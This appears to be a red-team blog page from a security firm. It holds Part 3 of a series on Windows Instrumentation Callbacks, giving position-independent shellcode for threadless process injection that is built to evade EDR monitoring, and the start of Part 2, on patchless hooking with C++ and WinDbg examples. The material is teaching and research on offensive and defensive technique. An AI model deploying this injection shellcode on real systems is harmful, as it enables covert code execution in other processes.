I also found a blog post by splinter_code who seems to have already written a blog post about using ICs for process injections in 2020. Don’t worry, we will of course expand on that and not copy his work. How complicated your IC injection code needs to be heavily depends on your payload. Assume you, for example, only want to make one WinExec call and your payload in total got like ten assembly operations, this won’t add a massive overhead to your program. You could just directly call the payload in the IC (assuming you added a way to disable syscall recursion in the IC), but once you use a payload that yields, for example a C2 agent, the program will stop working/run into issues because a required thread was hijacked. splinter_code solved this by creating a new thread, which is a valid approach. However, I wanted to avoid thread creation callbacks. So, how do we execute code without spawning a new thread and without causing the thread that called the IC to yield for long? By instead spawning a process. Just kidding, let’s reuse the hooking method we used in the previous blog post and instead hook a thread exit to hijack the thread. Threadless injections are no novel concept, but they normally use byte patches or register an exception handler for patchless hooking. Using ICs we can avoid registering an exception handler. In our case we still set a hardware breakpoint, but you could also, for example, use page guards.

To keep this post brief, we will not cover the following relevant topics, as they are not specific to this injection technique and there are multiple ways of implementing those: process ID enumeration, handle opening, memory allocation, memory writing.

Only one note on handle opening: a cautious reader of the OpenProcess MSDN page might’ve read the following part: “If the caller has enabled the SeDebugPrivilege privilege, the requested access is granted regardless of the contents of the security descriptor.” As said in the recap, we found out that the SeDebugPrivilege is required to set an IC on another process in the first blog post. Herein lays the fundamental “problem” of using an IC as an injection technique. The SeDebugPrivilege is a very powerful privilege, as it effectively disables security checks. This means, the injector already needs extensive privileges on the computer to use an IC as an injection technique. As mentioned by Microsoft, members of the Administrators group have the SeDebugPrivilege by default. This also means that for you to test your injector you need that privilege, for example by launching the injector from an administrative PowerShell.

Core injection logic

To simplify the rest of the blog post, let’s define some words that we will use:

  • Payload: This is the code that should get executed as the goal of the injection, in our case it will be a WinExec call that spawns a calculator. In your case it could be whatever, it could for example also be a manual mapper that maps an entire DLL into the victim process.
  • Payload wrapper: This includes all the code that sets up the payload execution. We will define the specific requirements later, but the wrapper is what the IC will execute. It is basically the IC bridge from the previous posts with some additional logic, just that it is this time injected into another process for the IC to execute there and not in its own process context. The wrapper remains static, only the payload changes.
  • Wrapped payload: Both the payload and the payload wrapper. The wrapped payload will be allocated and written to the victim process, not the payload and payload wrapper individually.

In the previous two blog posts we did not delve further into the build system, as we simply linked our C++ code with the assembly IC bridge; however, this isn’t what we will be doing this time. Both the payload and payload wrapper need to be position-independent, as they shouldn’t be executed in our process’s context but instead the victim’s. This also means that we need both the starting address and the size of the assembly code to copy it over to the other process. I find the easiest way to do this is to write the entire shellcode in an assembly file and then use a build system such as CMake with pre-compile steps to first assemble the assembly and then write them to a C++ header file that simply contains a C++ array with the assembled bytes in it.

In other words: the CMakeLists.txt file contains multiple add_custom_commands, which first executes the assembler (we’re using nasm), then uses objcopy to copy out the .text section of the object file into a temporary binary file and then executes a Python script to read in the binary file and converts it into a C++ array, which is written to a header file that is part of the CMake targets’ sources. In this case, we only did this for the payload wrapper.

Payload

As mentioned before, we’re using nasm as assembler for this post. “;” marks comments in nasm.

For our testing we used the following hard-coded payload:

mov ecx,0x636c6163 ; calc
push rcx
mov rcx, rsp
mov r14,0x7fffffffffffffff ; will be replaced with WinExec

sub rsp, 0x28 ; Shadow space + alignment
call r14
add rsp, 0x30
ret

Consultant

Category
Date
Navigation

As can be seen, a null-terminated “calc” string is pushed onto the stack and used as an argument to a call to 0x7fffffffffffffff after the stack was aligned (RSP % 0x10 = 0).

But why are we using 0x7fffffffffffffff as a call target? We aren’t, we are simply using it as a placeholder. ASLR changes the memory address of, among other things, WinExec. This means, WinExec’s address isn’t known at compile time. There are two solutions for this:

  1. We add a dynamic resolution function to the shellcode with, for example, a PEB walk.
  2. We abuse the fact that ntdll, kernel32 and kernelbase (the DLLs we will require) have the same base address in all processes, as it only gets changed on a reboot. This means, the address of WinExec in the injector is the same as in the process to inject into.

In this case we utilize option 2 to keep the shellcode small. Using a search function, 0x7fffffffffffffff will be replaced before it is injected into the other process to update it to its correct address. This is possible because, as mentioned, we copy the assembled bytes of the assembly code to an array, meaning the required bytes are not in R-X memory but in RW-. This could of course also be rewritten so that it reads in a payload instead of having it hard-coded.

The payload can be anything, as long as it considers the following restrictions:

  • Needs to be position-independent
  • Needs to properly restore the stack after execution or terminate its own thread

Payload wrapper

So, what does the payload wrapper need to include? Everything to correctly set up the payload execution, in other words all the IC logic. First off, we don’t want our payload to execute multiple times, so in our example have multiple calculators pop up. That means, if we don’t want to unregister our IC after execution, we need a flag to signal when the payload was already executed. As the payload should execute once in the entire process and not once every thread, we will need a process-wide flag. We will implement a process-wide flag and not unregister the IC, as we can’t spoon-feed you everything 😉

Also, as mentioned, we will be setting a hardware breakpoint on a thread exit (RtlExitUserThread). It would be very inefficient if we set the hardware breakpoint again and again on every IC call. So, we will also need a thread-local flag to signal when the breakpoint was set, so this step will be skipped on all following IC calls from that thread.

The injected IC should execute the following rough pseudo-code logic:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
if (!payload_executed && !thread_set_hardware_bp) {
   thread_set_hardware_bp = true
   if (!set_hwbp(RtlExitUserThread)) // Does syscall
     thread_set_hardware_bp = false   
   return
}
if (!is_exception(ic_origin))
   return
if (exception_origin != RtlExitUserThread)
   return
remove_hwbp(RtlExitUserThread) // Does syscall
if (!payload_executed) {
   payload_executed = true 
   execute_payload() // (Most likely) does syscall
}
restore_context()
}

In the previous posts we used a flag to avoid recursion; in this case we don’t need a second thread flag. The only way for a syscall to happen if the exception doesn’t come from our breakpoint is through set_hwbp, which is why the flag is enabled before the function call and unset if the breakpoint wasn’t set successfully.

This means, GetThreadContext and SetThreadContext, the two functions issuing a syscall down the line, trigger the IC again but since they aren’t the expected exception they just return from the IC.

A process-local flag can be set by allocating memory with read and write permissions and using a certain address as a flag. As we want to avoid any RWX memory allocations, we will need two memory regions with different permissions: RW- for the flag and R-X for the code itself. RWX allocations should be avoided due to them being highly suspicious. This causes another issue: the flag address can’t be known at runtime due to being dynamically allocated. If we allocated the memory for the flag from inside the executable code that was written to the victim process, we would only have the address of the flag in the same IC call in which the flag was allocated, due to the memory region being not writable, so we couldn’t store it.

Our solution for this is to use a placeholder address for the flag such as with the WinExec address in the payload. The injector first allocates the memory for the flag and then searches for the placeholder inside the compiled wrapper that was written to an array through prebuild steps, replaces it with the address of the allocated memory and only then writes the wrapper to the victim process.

Setting a hardware breakpoint

As mentioned, we will use the same hooking technique used in the previous blog post to hook RtlExitUserThread, just that this time we will need to inject that code into the other process meaning it needs to be position-independent shellcode instead of a regular C++ function. This does not only apply to setting the hardware breakpoint but all the code that needs to get injected. As this is a bunch of assembly instructions, let’s start by writing the helper functions before the core execution logic.

The following code basically does the following:

bool set_dr(DWORD64 bp_address, bool enable) {
CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
GetThreadContext(GetCurrentThread(), &context);
context.Dr3 = bp_address;
context.Dr7 |= 1ULL << 6;
SetThreadContext(GetCurrentThread(), &context);
}

Approximately this can be done with the following code; we just hard-coded the usage of Dr3 for no specific reason. You could of course also use other debug registers or add the possibility to add all of them.

; rcx = breakpoint address
; rdx = Enable (1) / Disable (0)
; Return: Rax != 0 = success
; RSP needs to be aligned
set_dr:
   ; Save used registers
   push r14
   push r13
   push rdi
   push rbx
   mov r13, rcx
   mov rbx, rdx
   sub rsp, 0x4d8 ; Size of CONTEXT struct + 8 alignment
   mov rdi, rsp ; CONTEXT base
   mov r14, rdi ; rep stosq changes rdi, this is backup
   ; Zero CONTEXT struct
   mov rcx, 0x9a ; (4d0 / 8) --> amount of uint64_t's
   xor rax, rax
   rep stosq
   ; CONTEXT_DEBUG_REGISTERS
   mov dword [r14 + 0x30], 0x00100010
   ; GetCurrentThread() == -2
   xor rcx, rcx
   dec rcx
   dec rcx
   ; The saved CONTEXT base
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; GetThreadContext placeholder
   mov rdi, 0x6CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
   ; if return value == 0 it errored
   test rax, rax
   jz _set_dr_ret
   ; Set Dr3
   mov qword [r14 + 0x60], r13
   ; offsetof(CONTEXT, Dr7) = 0x70
   mov rcx, [r14 + 0x70]
   ; Clear Dr3 specific bits
   and rcx, ~((3 << 16) | (3 << 18) | (1 << 6)) 
   test rbx, rbx
   jz _skip_enable_bp
  ; Set local Dr3 enable (Execution type execute = 0 & length needs to be 0)   
  or rcx, (1 << 6) 
_skip_enable_bp:
   ; Dr7 = new Dr7
   mov [r14+0x70], rcx
   ; SetThreadContext
   xor rcx, rcx
   dec rcx
   dec rcx
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; GetThreadContext placeholder
   mov rdi, 0x5CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
_set_dr_ret:
   add rsp, 0x4d8 ; + 8 alignment
   pop rbx
   pop rdi
   pop r13
   pop r14
   ret

Flag helper functions

For the process-wide flag, we will use a placeholder (0x2CCCCCCCCCCCCCCC), which will be replaced at runtime. For the thread-local one, we will again use the Thread Environment Block. There are more unsuspicious ways of doing this.

load_bp_set_ptr_into_rcx:
; TEB 
mov rcx, gs:[30h]
; TEB->InstrumentationCallbackDisabled 
add rcx, 1b8h
ret
load_bitflag_into_rcx:
; rcx = pointer bit flag (placeholder currently)
mov rcx, 0x2CCCCCCCCCCCCCCC
ret

Execution logic

Looking back at the pseudo code, we got set_hwbp and remove_hwbp covered and now also got access to the two flag variables through the helper functions, so let’s get to implementing the core logic. I didn’t mention one requirement in the pseudo code: stack alignment. Callbacks aren’t always guaranteed to be aligned (RSP % 0x10 != 0, sometimes RSP % 0x10 = 8). To avoid issues, we are manually aligning the stack so all Windows API calls and also the payload call is 16 bytes aligned. So that the stack can be properly restored, we aren’t simply overwriting RSP but instead push a placeholder to check when returning if the stack was adjusted.

entry:
; The actual return address of the IC
push r10
push r14
mov r14, rsp
add r14, 0x10
push rax
push rcx
push rdx
; Rsp should be aligned for both cases, so it’s done here
mov rdx, rsp
and dl, 0xF
cmp dl, 0x8
jne _skip_align
mov rdx, 0xDEADBEEF
push rdx
_skip_align:
call load_bp_set_ptr_into_rcx
xor rax, rax
cmp [rcx], rax
je _hwbp_is_set
; “is_exception” check and payload execution
_hwbp_is_set:
; […]
_ret_unalign:
; Unalign rsp if it was previously modified
cmp dword [rsp], 0xDEADBEEF
jne _ret
add rsp, 8
_ret:
pop rdx
pop rcx
xor rcx, rcx
pop rax
pop r14
; r10 still on top of stack à return to it
ret

First execution

To follow the execution flow logically, let’s first cover what happens when an IC is first triggered in a thread (_first_execution_in_thread). Let’s look at the relevant excerpt from the pseudo code:

[…]
if (!payload_executed && !thread_set_hardware_bp) {
   thread_set_hardware_bp = true
   if (!set_hwbp(RtlExitUserThread)) // Does syscall
     thread_set_hardware_bp = false   
   return
}
[…]

The first line of this pseudo code was already partially written in the execution logic chapter. Only the first part of the if statement, whether the payload was executed or not, is missing. In addition to checking that, we need to set the flag that the hardware breakpoint was set to not call the IC recursively. If setting the HWBP wasn’t successful, the flag should be unset.

As we already wrote our helper functions to retrieve the flag addresses and set a breakpoint, this is simply a matter of combining things:

_hwbp_is_set:
call load_bitflag_into_rcx
xor rax, rax
inc rax
; Was payload already executed? If yes, don’t set BP
cmp [rcx], rax
je _ret_unalign
 ; Set BP set flag to avoid recursion
call load_bp_set_ptr_into_rcx
 xor rax, rax
inc rax
; bp set flag = 1
mov [rcx], rax
; RtlExitUserThread placeholder
mov rcx, 0x3CCCCCCCCCCCCCCC
xor rdx, rdx
inc rdx ; Enable hwbp
call set_dr
; Failed (rax != 0)?
test rax, rax
jnz _ret_unalign
;  bp set flag = 0 to retry on the next IC trigger
call load_bp_set_ptr_into_rcx
xor rax, rax
mov [rcx], rax
; Fall through on purpose to return
_ret_unalign
; […]

After HWBP was set

Let’s look back at the pseudo code for all this to function. We already wrote the code for the first execution within a thread and the logic to set a HWBP. All that’s left to do now is the following excerpt from the pseudo code:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
[…]
if (!is_exception(ic_origin))
   return
if (exception_origin != RtlExitUserThread)
   return
remove_hwbp(RtlExitUserThread) // Does syscall
if (!payload_executed) {
   payload_executed = true 
   execute_payload() // (Most likely) does syscall
}
restore_context()
}

We already implemented most of the required logic in the second part of this series – just in C++. If you are unsure how to detect whether the IC was triggered by a HWBP and how to restore execution after a HWBP was triggered, we recommend reading the second part of this series again and then returning to this point. We will, for example, not again explain how we know that we need to intercept KiUserThreadExceptionDispatcher.

Alright, back to coding:

; […]
; Check if the hardware breakpoint was triggered
; KiUserThreadExceptionDispatcher placeholder
   mov rcx, 0x4CCCCCCCCCCCCCCC
   cmp r10, rcx
   jne _ret_unalign
; r14 is still the top of the original stack
; this should be a CONTEXT*, if it is a nullptr its bad :)
   test r14, r14
   jz _ret_unalign
   ; Exception thrown, but is it ours?
   ; RtlExitUserThread placeholder
   mov r10, 0x3CCCCCCCCCCCCCCC
   mov rcx, [r14+0xf8]
   cmp r10, rcx
   ; Not our exception
   jne _ret_unalign
   ; Unset bp
   xor rcx, rcx
   xor rdx, rdx
   call set_dr
   call load_bitflag_into_rcx
   ; Save context base
   push r14
   ; payload was already executed
   cmp qword [rcx], 1
   je _restore_context
   ; Set payload executed flag
   mov qword [rcx], 1
   sub rsp, 0x20
   call payload
   add rsp, 0x20
   ; as you can see, the payload needs to not mangle the stack
   ; otherwise it should call RtlExitUserThread itself
   ; if it mangled the stack rcx wouldn’t be the context base in the next line
_restore_context:
   ; Restore context base to rcx     
   pop rcx
   ; Set ResumeFlag in EFlags register
   or dword [rcx+0x44], 0x10000
   ; ExceptionRecord = nullptr
   xor rdx, rdx
   ; Call RtlRestoreContext
   sub rsp, 0x20
   mov rdi, 0x8CCCCCCCCCCCCCCC
   call rdi
   ; RtlRestoreContext doesn’t return

If you were a careful reader and/or followed along and tried to assemble the code yourself, you might’ve noticed that the ‘payload’ label is missing. Where does it come from? Easy, we just added the payload label at the end of all our code to use a relative reference. That way we can just add the payload to the end of the payload wrapper and it will be able to execute the payload, even if the payload and the wrapper were assembled separately and the byte arrays were just added to each other.

If you made it this far and understood what we were doing, congrats! You’ve pulled through, now we can finally transition back to C++.

C++ code

If you followed our recommendation of using CMake/a build system with prebuild steps to assemble the assembly for you and transform it to a byte array, you should most likely have two arrays now: one for your payload and one for the wrapper. If you only got one fixed payload you always want to use after compilation, you could of course also directly assemble both the payload and the wrapper together or directly copy them together with prebuild steps.

Now you need to replace the placeholders in that/those byte arrays. You could of course also add a PEB walk to dynamically retrieve the required function addresses and not use placeholders; we decided against this for our wrapper for size reasons and to keep the blog post brief.

Talking about that, the blog post is already pretty long so we’ve decided to not add any of our C++ code 😉. If you understood the blog series so far, searching for 8-byte numbers in a byte array and replacing them should be an easy task for you. If you go through the assembly again, you will need to replace the placeholders 0x2CCCCCCCCCCCCCCC till 0x8CCCCCCCCCCCCCCC. The placeholders are commented with what function they require. The flag placeholder simply requires a 1-byte allocation with read and write permissions in the target process.

After replacing the placeholders and adding them to one array/vector, that data needs to be written to an executable memory region in the victim process. For this, obviously an opened handle is required that allows memory writing and memory allocations if any allocations are done. After the shellcode was copied over, an IC needs to be set on the other process with the callback being specified as the start of the copied shellcode. For this, a handle with the PROCESS_SET_INFORMATION access mask is required. Keep in mind that you require the SeDebugPrivilege to set an IC onto another process. You can, for example, start your program from an administrative PowerShell.

Closing words

In this blog post you learned how to write the shellcode required to inject shellcode into another process with ICs. You hopefully also managed to write the required C++ code yourself. This is of course not the only way to utilize ICs for injections. To my knowledge ICs are the most powerful feature of Windows usable in user mode. In general, we only covered a fraction of what is possible with ICs, for example we haven’t covered getting callbacks to APCs with them.

ICs aren’t only usable in offensive ways though; they are, for example, also very interesting for EDRs and anti-cheats.

Three parts of this series were about mainly offensive use cases of ICs. In the next and last part of this series, we will discuss ICs from a more defensive standpoint: how they can be detected and how to detect if someone overwrote your IC.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Reverse Engineering

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Windows Instrumen­tation Callbacks – Part 2

Search

Windows Instrumen­tation Callbacks – Part 2

November 12, 2025

Windows Instrumentation Callbacks – Hooks, Part 2

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you have not yet read the first part of this series, we strongly recommend you read it to find out what ICs are and how to set them.

In this blog post you will learn how to do patchless hooking using ICs without registering or executing any user mode exception handlers.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older windows versions nor WoW64 processes will be discussed.

Recap

In the first blog post we learned how to install an IC on a process and how to use that callback to interact with specific syscalls. We learned this by intercepting the syscall made by OpenProcess inside the subfunction NtOpenProcess. After intercepting NtOpenProcess, we close the handle that was opened and spoof a return value of STATUS_ACCESS_DENIED. This allows us to get a callback on every syscall that returns and which was made. However, it does not allow hooking arbitrary code. Also consider this: a program calls NtSetInformationProcess to set its own IC after you have already set an IC. Which IC do you think is called? Your original IC or the new IC passed in NtSetInformationProcess? Give it a try.

Hooking

If you are reading this article, there’s a good chance you know what patchless hooking is. If you don’t, we will explain the patchless part; however, you are assumed to know what hooking in general refers to.

There are many hooking techniques, but they are either patchless or require a patch. Regular inline hooks work by patching the executable memory/the binary to redirect execution to the code of the installed hook. Assuming a person wants to hook a binary file on disk, and changes (aka patches) the binary’s bytes, the signature of the binary is changed, as the binary no longer contains the same bytes.

Patchless hooking

As you might’ve guessed, patchless hooking techniques are techniques that do not require a patch. This means, none of the bytes in the executable memory region that is to be hooked are changed, so the signature of that memory region stays the same, meaning the hook can’t be detected by signature scans.

The most common patchless hooking techniques in Windows user mode are probably vectored exception handler (VEH) hooking and page guard hooking. Both these techniques utilize a core concept of Windows and operating systems in general: exceptions.

Page guard hooking works by setting the PAGE_GUARD memory page protection modifier on a certain memory page. Once that memory page is accessed, the system raises an exception that can be handled by an exception handler.

VEH hooking also requires setting up an exception handler, but instead of page guards, hardware breakpoints are used to trigger the exceptions.

Assuming you, for example, add a __debugbreak() to your C/C++ code that adds a software breakpoint, hardware breakpoints are generated by the CPU.

Hardware breakpoints can be set with specific registers in x86_64 CPUs:

  • Dr0-3: These four registers contain the addresses of where the breakpoint should be set.
  • Dr6: This is the status register that contains information about which breakpoint fired during exception handling.
  • Dr7: This is the control register that, using bit flags, controls which debug registers are active and what type of breakpoint is used: read/write/execute.

Exceptions and vectored exception handling

In short, VEHs allow developers to register their own exception handler. For this, Microsoft provides the function AddVectoredExceptionHandler. Let’s look at the function definition:

PVOID AddVectoredExceptionHandler(
ULONG                       First,
PVECTORED_EXCEPTION_HANDLER Handler
);

The function takes a pointer to an exception handler function and an ULONG parameter. Internally, Windows stores the pointers to all the exception handlers in a linked list. If the ULONG parameter, i.e. the parameter called First, is not zero, the exception handler will be added to the start of the linked list instead of the end.

The Handler parameter takes a function pointer to the exception handler that should be added. The function should look as follows according to MSDN:

LONG PvectoredExceptionHandler(
[in] _EXCEPTION_POINTERS *ExceptionInfo
)

The function should take a pointer to an EXCEPTION_POINTERS structure as that will hold the information about the exception which occurred. Most importantly, it will hold a CONTEXT structure of when the exception occurred. The CONTEXT structure holds processor-specific register data such as the member Rip containing the value the CPU register rip had when the exception occurred.

According to documentation, the exception handler should either return EXCEPTION_CONTINUE_EXECUTION (-1) or EXCEPTION_CONTINUE_SEARCH (0). This is used by Windows to decide whether the exception was handled or if the executed exception handler could not/did not want to handle the exception.

The process goes as follows: when an exception is thrown, a context switch to kernel mode occurs, which will then fill out an EXCEPTION_POINTERS structure based on the thrown exception. The kernel then returns to user mode and executes one VEH after another until one of them responds with EXCEPTION_CONTINUE_EXECUTION. If no VEHs to execute are left and the exception wasn’t handled, the process terminates.

The exception handling works based on a first-come, first-served principle: if a VEH in the linked list responds with EXCEPTION_CONTINUE_EXECUTION, the VEHs contained in the linked list after the executed VEH will no longer be executed.

There are ways to avoid calling AddVectoredExceptionHandler to register a VEH, for example by manually locating and manipulating said linked list. However, the same problems and IoCs remain:

  • Our own VEH needs to be part of the linked list.
  • All VEHs before our own VEH in the linked list are executed and can handle the exception first.

Wouldn’t it be nice if we could handle exceptions without adding our exception handler to the linked list while also guaranteeing that our exception handler is executed before any other exception handlers? Or without even calling the other exception handlers at all?

If you were a careful reader of the first part of the series, you might’ve already concluded where this is going: if an exception is a user-mode-to-kernel context switch, which then returns to user mode, can we intercept the return to user mode with our IC?

How convenient that we also created a PoC to log syscall names in the first part. Why don’t we just try using that PoC to see if something shows up when an exception is thrown?

KiUserExceptionDispatch

When an exception is thrown, the KiUserExceptionDispatch function from ntdll is called. As the kernel returns here, we’re guessing that this function most likely calls the registered exception handlers somewhere down the road. Let’s check this theory by opening ntdll! KiUserExceptionDispatch in a decompiler. Luckily, figuring out what the function does is simple because of function names provided by Microsoft:

+0x00    void KiUserExceptionDispatch() __noreturn
+0x00    {
+0x00        int64_t Wow64PrepareForException_1 = Wow64PrepareForException;
+0x0b        void arg_4f0;
+0x0b      
+0x0b        if (Wow64PrepareForException_1)
+0x1a            Wow64PrepareForException_1(&arg_4f0, &__return_addr);
+0x1a      
+0x29        char rax;
+0x29        int64_t r8;
+0x29        rax = RtlDispatchException(&arg_4f0, &__return_addr);
+0x30        int32_t rax_1;
+0x30      
+0x30        if (!rax)
+0x30        {
+0x4b            r8 = 0;
+0x4e            rax_1 = NtRaiseException();
+0x30        }
+0x30        else
+0x37            rax_1 = RtlGuardRestoreContext(&__return_addr, nullptr);
+0x37      
+0x55        RtlRaiseStatus(rax_1);
+0x55        /* no return */
+0x00    }

We can ignore the Wow64 functions because we are only focussing on ICs in non-Wow64 processes as mentioned in the disclaimer.

The code after the Wow64 functions looks interesting; RtlDispatchException is called with two parameters. The parameter names were auto-generated by BinaryNinja.

If we look at the disassembly of the function, we can see that both parameters used for calling RtlDispatchException are taken from the stack. This is also why the second parameter was named as __return_addr by BinaryNinja, as the address is on top of the stack, which is normally the return address. Further down the decompiled snippet, we see a call to RtlGuardRestoreContext. This function does not have documentation on MSDN; however, RtlRestoreContext does. If we peek into RtlGuardRestoreContext with a disassembler/decompiler, we can see it’s just a wrapper around RtlRestoreContext with some sanity checks. Looking at the documentation, we can see that RtlRestoreContext takes a pointer to a CONTEXT structure and an optional second pointer to a _EXCEPTION_RECORD struct. So, the parameter named __return_addr by BinaryNinja is a pointer to the CONTEXT structure of the exception. Theoretically, this would already suffice to do some basic hooks, but let’s get access to the other member of the EXCEPTION_POINTERS structure: EXCEPTION_RECORD. If __return_addr is the CONTEXT structure, the first argument is the EXCEPTION_RECORD structure, as that is also retrieved from the stack that was set up by the kernel for the user mode exception handling. Let’s not overcomplicate things with further static analysis; instead, we can write a program that uses VEH and attach a debugger to it. For this, I’ll use the following program that registers a VEH and then performs a null pointer dereference to cause an exception:

#include "Windows.h"
long exception_handler(EXCEPTION_POINTERS* exception_info) {
   return EXCEPTION_CONTINUE_SEARCH;
}
int main()
{
   AddVectoredExceptionHandler(1, &exception_handler);
   bool* test = nullptr;
   *test = true;
   return 0;
}

Following the compilation, the program was opened in the debugger WinDbg.

First, breakpoints on both the exception handler and the call to RtlDispatchException inside the function KiUserExceptionDispatch were set, as RtlDispatchException takes the pointer to the CONTEXT structure and another parameter, which might be a pointer to the EXCEPTION_RECORD structure.

0:000> bp ntdll!KiUserExceptionDispatch+0x29
0:000> bp exception_handler

After resuming execution, the breakpoint in KiUserExceptionDispatch is executed first as expected. After the breakpoint is triggered, we read out rcx and rdx, because according to the Windows x64 calling convention, these registers will hold the first and second function parameter.

Breakpoint 0 hit
ntdll!KiUserExceptionDispatch+0x29:
00007ffe`2f571439 e8d20efbff      call    ntdll!RtlDispatchException (00007ffe`2f522310)
0:000> r rcx
rcx=0000003d38affa30
0:000> r rdx
rdx=0000003d38aff540

Now, we need to cross-reference these values with the values of the EXCEPTION_POINTERS structure that is passed to the exception handler. This can easily be done with a handy feature of WinDbg: the display type command (dt).

0:000> g
Breakpoint 1 hit
veh_hooking_test!exception_handler:
00007ff7`30c41000 50              push    rax
0:000> dt EXCEPTION_POINTERS @rcx
veh_hooking_test!EXCEPTION_POINTERS
  +0x000 ExceptionRecord  : 0x0000003d`38affa30 _EXCEPTION_RECORD
+0x008 ContextRecord    : 0x0000003d`38aff540 _CONTEXT

As you can see, our assumption was correct: the parameters passed to RtlDispatchException are the EXCEPTION_RECORD and CONTEXT structure. As you can also see, KiUserExceptionDispatch calls RtlGuardRestoreContext on the CONTEXT structure after RtlDispatchException was executed.

RtlRestoreContext, the function internally called by RtlGuardRestoreContext, sets the registers of the specified thread as specified in the CONTEXT struct passed to that function. This means, rip, the instruction pointer, is also overwritten so code after the call to RtlRestoreContext is never executed. This also means that the C++ function (named instrumentation_callback in the previous blog post) won’t return to your assembly bridge to execute everything after the C++ function call.  The IC flag will thus never be reset.

IC exception handling

We now know how we can get access to the EXCEPTION_RECORD and CONTEXT structures and know how KiUserExceptionDispatch resumes execution – with RtlGuardRestoreContext.

All we now need to do is get our IC to intercept KiUserExceptionDispatch, retrieve the EXCEPTION_RECORD and CONTEXT off the stack and resume execution if we want to handle the exception.

We will reuse the same assembly bridge as in the first part of this blog series.

For now, let’s not add hooking but instead create a regular exception handler that continues execution after an access violation. For this, a modified version of the code snippet previously used for debugging will be used. The following snippet adds a regular exception handler that returns EXCEPTION_CONTINUE_EXECUTION, which means that the exception was handled, and that the execution of the program can continue:

#include "Windows.h"
#include "print"
long exception_handler(EXCEPTION_POINTERS* exception_info) {
   exception_info->ContextRecord->Rip += 3;
   return EXCEPTION_CONTINUE_EXECUTION;
}
int main()
{
   AddVectoredExceptionHandler(1, &exception_handler);
   bool* test = nullptr;
   *test = true;
   std::println("Access violation skipped");
   return 0;
}

You might wonder why we are adding a hardcoded value of 3 to the value of rip that is saved in the CONTEXT record. This is used to skip the access violation at the line *test = true, as it gets compiled to the bytes c60001, so 3 bytes that need to get skipped to prevent the exception from being triggered again once execution continues.

In non-test code you would not want to do this, as a different compiler or the same compiler with different settings could also produce other instructions to perform the same logic. Normally, you would want to use a disassembler such as Zydis to disassemble the instruction rip points to, to dynamically calculate the length of the instruction. We decided against this to keep the snippet code as minimal as possible.

Let’s now remove the AddVectoredExceptionHandler line and try to replace it with an IC.

First, register an IC using the same logic/code as in the first part of this series. In this part, we will only cover changes to the instrumentation_callback function, as the rest remains the same as in the first blog post.

The following IC can be used to execute the same exception handler that would’ve been called if you added it with AddVectoredExceptionHandler. The code for the function is simple; if you’ve understood the blog posts so far you shouldn’t have a problem understanding it. The only part that was not covered was the offset of 0x4f0 from rsp to get the EXCEPTION_RECORD*. This comes from KiUserExceptionDispatch. We only showed the decompiled version of the code, which of course does not contain the stack offsets. If you disassembled that function and looked at the function call to RtlDispatchException, you would see the 0x4f0 offset.

You might also notice that we are using KiUserExceptionDispatcher instead of KiUserExceptionDispatch with GetProcAddress. That is because the function is exported as KiUserExceptionDispatcher.

extern "C" uint64_t instrumentation_callback(uint64_t original_rsp, uint64_t return_addr, uint64_t return_val) {
static uint64_t user_exception_addr = 0;
if (!user_exception_addr) {
   user_exception_addr = reinterpret_cast<uint64_t>(GetProcAddress(GetModuleHandle("ntdll.dll"), "KiUserExceptionDispatcher"));
}
if (return_addr != user_exception_addr)
   return return_val;
EXCEPTION_POINTERS exception_pointers = {};
exception_pointers.ContextRecord = reinterpret_cast<CONTEXT*>(original_rsp);
exception_pointers.ExceptionRecord = reinterpret_cast<EXCEPTION_RECORD*>(original_rsp + 0x4f0);
auto exception_status = exception_handler(&exception_pointers);
if (exception_status == EXCEPTION_CONTINUE_SEARCH)
   return return_val;
RtlRestoreContext(exception_pointers.ContextRecord, nullptr);
// This will never be reached if RtlRestoreContext executes successfully
return return_val;
}

With this code, the Windows exception handlers are never executed if our own exception handler returns EXCEPTION_CONTINUE_EXECUTION, as the code restores the context before the regular exception handlers are even called.

Hooking with ICs

Skipping access violations is cool, but it’s not useful compared to what else we can do with an exception handler. So, let’s return to the main topic of this blog post: how to hook code with ICs. For this, we will create an imaginary scenario: we have an installed IC and want to hinder someone else from overwriting/removing our IC. This will only work within the same process context because ICs are process-local – a different process can overwrite the IC remotely if it has the necessary privilege (SeDebugPrivilege).

We’ve touched on hardware breakpoints and debug registers before, but we haven’t set any. We mentioned that hardware breakpoints are set via CPU registers – the debug registers. This means, they are thread-specific: they will only trigger from the specific thread for which they were set. To set the breakpoints for the entire process, the hardware breakpoints need to be set for all threads, and you also need to be careful of thread creations.

Setting hardware breakpoints

To use hardware breakpoints, we first need to set the debug registers accordingly.

For this purpose, we created a function with the following function definition:

bool set_hwbp(debug_register_t reg, void* hook_addr, bp_type_t type, uint8_t len)

The definitions for the two custom enums debug_register_t and bp_type_t look as follows:

enum class debug_register_t {
Dr0 = 0,
Dr1,
Dr2,
Dr3
};
enum class bp_type_t {
Execute = 0b00,
Write = 0b01,
ReadWrite = 0b11
};

